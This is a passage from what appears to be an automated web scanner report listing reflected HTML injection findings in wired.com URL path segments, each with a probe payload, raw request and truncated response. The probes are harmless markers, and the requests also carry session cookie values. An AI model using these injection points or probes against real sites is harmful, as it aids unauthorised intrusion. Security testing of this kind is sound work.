Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29391
Vary: Accept-Encoding
Cache-Control: max-age=240
Expires: Mon, 22 Nov 2010 01:15:01 GMT
Date: Mon, 22 Nov 2010 01:11:01 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_ajax ss_widgets c_relateda940d"><a>ad6ce4969ca">
...[SNIP]...

1.458. http://www.wired.com/blogs [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /blogs

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 37e36"><a>663daf42f79 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /blogs37e36"><a>663daf42f79 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.wired.com/

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29320
Vary: Accept-Encoding
Cache-Control: max-age=240
Expires: Sun, 21 Nov 2010 22:29:37 GMT
Date: Sun, 21 Nov 2010 22:25:37 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_blogs37e36"><a>663daf42f79">
...[SNIP]...

1.459. http://www.wired.com/blogs/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /blogs/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b7458"><a>0bc4e457d49 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /blogsb7458"><a>0bc4e457d49/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29321
Vary: Accept-Encoding
Cache-Control: max-age=235
Expires: Sun, 21 Nov 2010 20:14:10 GMT
Date: Sun, 21 Nov 2010 20:10:15 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_blogsb7458"><a>0bc4e457d49">
...[SNIP]...

1.460. http://www.wired.com/cars [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /cars

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 808a6"><a>226b4160ebe was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /cars808a6"><a>226b4160ebe HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29298
Vary: Accept-Encoding
Cache-Control: max-age=240
Expires: Mon, 22 Nov 2010 01:15:09 GMT
Date: Mon, 22 Nov 2010 01:11:09 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_cars808a6"><a>226b4160ebe">
...[SNIP]...

1.461. http://www.wired.com/cars/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /cars/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 847ce"><a>650bafdb219 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /cars847ce"><a>650bafdb219/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29299
Vary: Accept-Encoding
Cache-Control: max-age=223
Expires: Sun, 21 Nov 2010 20:15:22 GMT
Date: Sun, 21 Nov 2010 20:11:39 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_cars847ce"><a>650bafdb219">
...[SNIP]...

1.462. http://www.wired.com/cars/coolwheels [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /cars/coolwheels

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 215d7"><a>d31fce4364 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /cars215d7"><a>d31fce4364/coolwheels HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29321
Vary: Accept-Encoding
Cache-Control: max-age=240
Expires: Sun, 21 Nov 2010 23:09:51 GMT
Date: Sun, 21 Nov 2010 23:05:51 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_cars215d7"><a>d31fce4364 ss_coolwheels">
...[SNIP]...

1.463. http://www.wired.com/cars/coolwheels [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /cars/coolwheels

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f0a5e"><a>3d542f5f695 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /cars/coolwheelsf0a5e"><a>3d542f5f695 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29323
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:16:18 GMT
Date: Sun, 21 Nov 2010 23:06:18 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_cars ss_coolwheelsf0a5e"><a>3d542f5f695">
...[SNIP]...

1.464. http://www.wired.com/cars/energy [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /cars/energy

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 93d8b"><a>cd4df970211 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /cars93d8b"><a>cd4df970211/energy HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29315
Vary: Accept-Encoding
Cache-Control: max-age=240
Expires: Sun, 21 Nov 2010 23:09:53 GMT
Date: Sun, 21 Nov 2010 23:05:53 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_cars93d8b"><a>cd4df970211 ss_energy">
...[SNIP]...

1.465. http://www.wired.com/cars/energy [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /cars/energy

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1a3cd"><a>1fe87d440bf was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /cars/energy1a3cd"><a>1fe87d440bf HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29315
Vary: Accept-Encoding
Cache-Control: max-age=554
Expires: Sun, 21 Nov 2010 23:15:34 GMT
Date: Sun, 21 Nov 2010 23:06:20 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_cars ss_energy1a3cd"><a>1fe87d440bf">
...[SNIP]...

1.466. http://www.wired.com/cars/futuretransport [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /cars/futuretransport

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e5a14"><a>265d8487a92 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /carse5a14"><a>265d8487a92/futuretransport HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29333
Vary: Accept-Encoding
Cache-Control: max-age=240
Expires: Sun, 21 Nov 2010 23:09:58 GMT
Date: Sun, 21 Nov 2010 23:05:58 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_carse5a14"><a>265d8487a92 ss_futuretransport">
...[SNIP]...

1.467. http://www.wired.com/cars/futuretransport [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /cars/futuretransport

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 36c73"><a>e09bc35649e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /cars/futuretransport36c73"><a>e09bc35649e HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29333
Vary: Accept-Encoding
Cache-Control: max-age=583
Expires: Sun, 21 Nov 2010 23:16:08 GMT
Date: Sun, 21 Nov 2010 23:06:25 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_cars ss_futuretransport36c73"><a>e09bc35649e">
...[SNIP]...

1.468. http://www.wired.com/culture [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /culture

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e8402"><a>edd50cf471 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /culturee8402"><a>edd50cf471 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29238
Vary: Accept-Encoding
Cache-Control: max-age=240
Expires: Mon, 22 Nov 2010 01:15:14 GMT
Date: Mon, 22 Nov 2010 01:11:14 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_culturee8402"><a>edd50cf471">
...[SNIP]...

1.469. http://www.wired.com/culture/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /culture/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e53de"><a>40592780ce4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /culturee53de"><a>40592780ce4/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29241
Vary: Accept-Encoding
Cache-Control: max-age=240
Expires: Sun, 21 Nov 2010 20:15:44 GMT
Date: Sun, 21 Nov 2010 20:11:44 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_culturee53de"><a>40592780ce4">
...[SNIP]...

1.470. http://www.wired.com/culture/art [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /culture/art

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8dbf8"><a>ab6cb8357ba was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /culture8dbf8"><a>ab6cb8357ba/art HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29251
Vary: Accept-Encoding
Cache-Control: max-age=240
Expires: Sun, 21 Nov 2010 23:09:58 GMT
Date: Sun, 21 Nov 2010 23:05:58 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_culture8dbf8"><a>ab6cb8357ba ss_art">
...[SNIP]...

1.471. http://www.wired.com/culture/art [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /culture/art

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4d542"><a>e8d21a02e71 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /culture/art4d542"><a>e8d21a02e71 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29251
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:16:24 GMT
Date: Sun, 21 Nov 2010 23:06:24 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_culture ss_art4d542"><a>e8d21a02e71">
...[SNIP]...

1.472. http://www.wired.com/culture/art/magazine/15-11/pl_arts [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /culture/art/magazine/15-11/pl_arts

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 86153"><a>a16e375242b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /culture86153"><a>a16e375242b/art/magazine/15-11/pl_arts HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29285
Vary: Accept-Encoding
Cache-Control: max-age=240
Expires: Sun, 21 Nov 2010 23:10:22 GMT
Date: Sun, 21 Nov 2010 23:06:22 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_culture86153"><a>a16e375242b ss_art c_magazine">
...[SNIP]...

1.473. http://www.wired.com/culture/art/magazine/15-11/pl_arts [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /culture/art/magazine/15-11/pl_arts

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 44d77"><a>f26f00f82f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /culture/art44d77"><a>f26f00f82f/magazine/15-11/pl_arts HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29283
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:16:41 GMT
Date: Sun, 21 Nov 2010 23:06:41 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_culture ss_art44d77"><a>f26f00f82f c_magazine">
...[SNIP]...

1.474. http://www.wired.com/culture/art/magazine/15-11/pl_arts [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /culture/art/magazine/15-11/pl_arts

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8e1d9"><a>1df8fb955e1 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /culture/art/magazine8e1d9"><a>1df8fb955e1/15-11/pl_arts HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
